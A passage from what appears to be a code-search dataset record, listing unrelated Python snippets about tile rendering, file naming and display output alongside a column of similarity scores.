\"npc\"\n or stage_tiles[\"{0},{1}\".format(x, y)] == \"sign\"):\n tile = stage_tiles.get(\"{0},{1}\".format(x, y), default_tile)\n color.write(TILES[tile], \"KEYWORD\")\n \n else:\n tile = stage_tiles.get(\"{0},{1}\".format(x, y), default_tile)\n color.write(TILES[tile], \"STRING\")\n\n elif \"{0},{1}\".format(x, y) in stage_tiles:\n if (stage_tiles[\"{0},{1}\".format(x, y)] == \"rock\"\n or stage_tiles[\"{0},{1}\".format(x, y)] == \"mountain\"):\n tile = stage_tiles.get(\"{0},{1}\".format(x, y), default_tile)\n color.write(TILES[tile], \"stderr\")\n\n else:\n tile = stage_tiles.get(\"{0},{1}\".format(x, y), default_tile)\n color.write(TILES[tile], \"stdout\")\n\n elif \"{0},{1}\".format(x,y) in special_tiles:\n if (special_tiles[\"{0},{1}\".format(x, y)] == \"dark_water\"):\n tile = stage_tiles.get(\"{0},{1}\".format(x, y), default_tile)\n color.write(TILES[tile],\"stdin\") \n else:\n print(TILES[default_tile], end='')\n x += 1\n print(\" \",end='')\n print(\"\")\n y -= 1\n x = 1", "def tile_id(self):\n return self._tile_id", "def filename(self, age, metal, imf=None):\n imf = 1.3 if imf is None else imf\n msign = \"p\" if metal >= 0. else \"m\"\n azero = \"0\" if age < 10. else \"\"\n fname = \"Ebi{0:.2f}Z{1}{2:.2f}T{3}{4:02.4f}_iTp0.00_baseFe.fits\".format(\n imf, msign, abs(metal), azero, age)\n return os.path.join(self.data_dir, fname)", "def get_filename(problem, width=3):\n return '{0:0{w}d}.py'.format(problem, w=width)", "def displayname(self):\n if self.path.is_dir():\n if (is_uuid(self.path.parts[-1])):\n self.is_uuid_folder = True\n return self.path.name + '/'\n elif is_proj(self.path.parts[-1]):\n return f'{bcolors.BOLD}' + self.path.name + f'{bcolors.ENDC}'\n return self.path.name", "def outname(self,sctn):\n return '%s_%s.html'%(self.basename,sctn)", "def __getTileSizeName(self, iter_name, level):\n return (\"T%s\" % level) + iter_name", "def save_top_tiles_on_original_image(pil_img, slide_name):\n t = Time()\n filepath = slide.get_top_tiles_on_original_image_path(slide_name)\n pil_img.save(filepath)\n print(\"%-20s | Time: %-14s Name: %s\" % (\"Save Top Orig\", str(t.elapsed()), filepath))", "def generate_tile_description(tile, time = None, depth = None):\n \n desc = \"s\"+ str(tile)\n if depth is not None:\n desc = desc + \"_z\" + str(depth)\n if time is not None:\n desc = desc + \"_t\" + str(time)\n return desc", "def file_on_disk_name(instance, filename):\n return generate_file_on_disk_name(instance.checksum, filename)", "def mugshot_file(self, instance):\r\n try:\r\n return admin_display_file(instance.user.user_files, 'mugshot')\r\n except Exception:\r\n return mark_safe('<i class=\"fa fa-times-circle red\" aria-hidden=\"true\"></i>')", "def number(cls, tileName):\n return TILENAMEMAP[tileName]['Number'] if tileName in TILENAMEMAP else None", "def favorite_number():\n\ttry:\n\t\tprint_number()\n\texcept FileNotFoundError:\n\t\tstore_number()\n\t\tprint_number()", "def get_file_name(self):\n return str(self.get_file())", "def display(self):\n for row in self.tile_rows:\n print(row)", "def render_tile(self, filename, tile_x, tile_y, zoom):\n print 'Rendering %s' % (filename)\n\n # Calculate pixel positions of bottom-left & top-right\n half_width = self.width / 2\n half_height = self.height / 2\n px0 = (tile_x * self.width, (tile_y + 1) * self.height)\n px1 = ((tile_x + 1) * self.width, tile_y * self.height)\n\n # Convert tile coords to LatLng\n ll0 = self.tile_projection.fromPixelToLL(px0, zoom);\n ll1 = self.tile_projection.fromPixelToLL(px1, zoom);\n \n # Convert LatLng to map coords\n c0 = self.map_projection.forward(mapnik2.Coord(ll0[0], ll0[1]))\n c1 = self.map_projection.forward(mapnik2.Coord(ll1[0], ll1[1]))\n\n # Create bounding box for the render\n bbox = mapnik2.Box2d(c0.x, c0.y, c1.x, c1.y)\n\n self.mapnik_map.zoom_to_box(bbox)\n self.mapnik_map.buffer_size = max([half_width, half_height]) \n\n # Render image with default Agg renderer\n image = mapnik2.Image(self.width, self.height)\n mapnik2.render(self.mapnik_map, image)\n image.save(filename, self.filetype)", "def __repr__(self) -> str:\n\n return f\"{self.filename}:{self.line}:{self.flag}\"", "def init_data_file_name():\n now = datetime.datetime.now().isoformat().split('.')[0].replace(':', '-')\n filename = 'show-commands-' + now + \".txt\"\n return filename", "def display(self, contents=False, recurse=False): # FileObj.display\n print '# File\\t\\t' + str(self.deleted) + '\\t' + str(self.ignore) + '\\t' + str(self.depth) + '\\t' + self.hexdigest + ' ' + self.pathname + ' '", "def __printThePath(self, tile):\n print()\n print(\"Path is found. Initial tile: \" + str(self.startingPoint) + \", Goal tile: \" + str(self.goalPoint))\n print(\"Here is the path cost: \" + str(tile.cost) + \" and path is:\")\n print(tile.pathToTile[::-1])\n print()", "def _repr_(self):\n if self.is_multitape:\n pos = tuple(p for p, t in sorted(self.position, key=lambda x: x[1]))\n return 'multi-tape at %s' % (pos,)\n else:\n return 'tape at %s' % (self.position[0][0],)", "def summary_title(tile_summary):\n return f\"Slide tile_summary.slide_name Tile Summary:\"", "def save(self, dataset, name=None):\n if name is None:\n prefix = 'checkpoints/' + self.model_name + '_' + dataset + '_'\n name = time.strftime(prefix + '%m%d_%H:%M:%S.pth')\n torch.save(self.state_dict(), name)\n return name", "def show(self,mode=0,level=0,ident=''):\n if self.locked : l='L'\n else : l=' '\n tmp= '%sd%-3d %s %-6s %-30s Vendor: %-10s %-10s Size: %10s' % \\\n (ident,self.idx,l,self.name,self.guid.strip()[-29:],self.vendor,self.model,printsz(self.size))\n if level>0:\n tmp+='\\n'+ident+' Paths:'\n for p in self.paths.values() : tmp+='\\n'+p.show(mode,level-1,ident+' ')\n tmp+='\\n'+ident+' Partitions:'\n for p in self.partitions.values() : tmp+='\\n'+p.show(mode,level-1,ident+' ')\n tmp+='\\n'\n return tmp", "def getImageTile(self, **kwargs):\n if self.hasImage():\n imgtileurl = self.getImage().absolute_url(1) + '_tile'\n portal_obj = getToolByName(self, 'portal_url').getPortalObject()\n portal_url = portal_obj.absolute_url(1)\n imgtileurl = imgtileurl.replace(portal_url, '')\n return imgtileurl\n return ''", "def draw_tile(tile_id):\n if tile_id == 0:\n return \" \"\n if tile_id == 1:\n return \"#\"\n if tile_id == 2:\n return \"+\"\n if tile_id == 3:\n return \"-\"\n return \"o\"", "def get_runinfo_basename():\n return \"dumpruninfo\"", "def ofile_name(self):\n return self.ofile", "def _print_info(self,\n step,\n loss,\n t_cost):\n format_str = ('{0}: step {1}, loss = {2:.2f}' \\\n '({3:.3f} sec/batch)')\n print format_str.format(datetime.now(), \\\n step, loss, t_cost)", "def dump_with_name(self, id_to_name):\n return str(id_to_name[self.player]) + str(self._num)", "def display_recent_shot(self, idx):\n self.display_shot(self.recent_shots[idx])", "def _save_target_info(self):\n \n #make sure the file exists\n path = self.communicator.image_store.project_path + \\\n self.target_file_name\n fout = open(path, 'w')\n\n print str(1)\n print str(len(self.target_list)-1)\n for i in range(1, len(self.target_list)):\n fout.write(self.target_list[i].format_info())\n fout.write(\"\\n\\n\")\n fout.close()", "def getNoteFileName(self, show, sequence, id):\n idPadded = self.__getPaddedId(id)\n fileName = Mode(show, sequence).get(\"[noteBaseName]\", {\"id\":idPadded})\n\n# log(\"getNoteFileName id: %s fileName: %s\" % (id, fileName))\n\n return fileName" ]
[ "0.7170778", "0.7017842", "0.62615716", "0.6062539", "0.6021516", "0.58989334", "0.5845273", "0.58161515", "0.5786859", "0.5772618", "0.5726611", "0.56966686", "0.568967", "0.5651235", "0.56373155", "0.5635666", "0.56198174", "0.5595406", "0.5574993", "0.5558204", "0.555806", "0.5532269", "0.5509232", "0.5489894", "0.5483133", "0.54824036", "0.54767215", "0.5471302", "0.54673797", "0.5435514", "0.542785", "0.54168427", "0.53953314", "0.53942585", "0.53881335", "0.5388119", "0.5373697", "0.5359125", "0.53588235", "0.5355472", "0.53463835", "0.53452724", "0.5344886", "0.53344804", "0.5333621", "0.5323911", "0.5285026", "0.5284034", "0.5281534", "0.5278909", "0.5265584", "0.5264429", "0.52434826", "0.52428406", "0.52414733", "0.5238826", "0.5238007", "0.5236074", "0.52322036", "0.5232053", "0.5230393", "0.5224431", "0.5223597", "0.52183735", "0.5214858", "0.52122444", "0.52119863", "0.5203053", "0.5191486", "0.5190306", "0.5175886", "0.51723135", "0.51670194", "0.5156692", "0.51525176", "0.51399004", "0.51325095", "0.51308113", "0.51229364", "0.5121248", "0.512032", "0.5119168", "0.5116024", "0.5108937", "0.5101353", "0.50998396", "0.5099116", "0.5096093", "0.5091127", "0.508694", "0.507942", "0.5076065", "0.5074788", "0.5071387", "0.5067344", "0.50638837", "0.5061053", "0.505541", "0.505295", "0.5037424" ]
0.68945366
2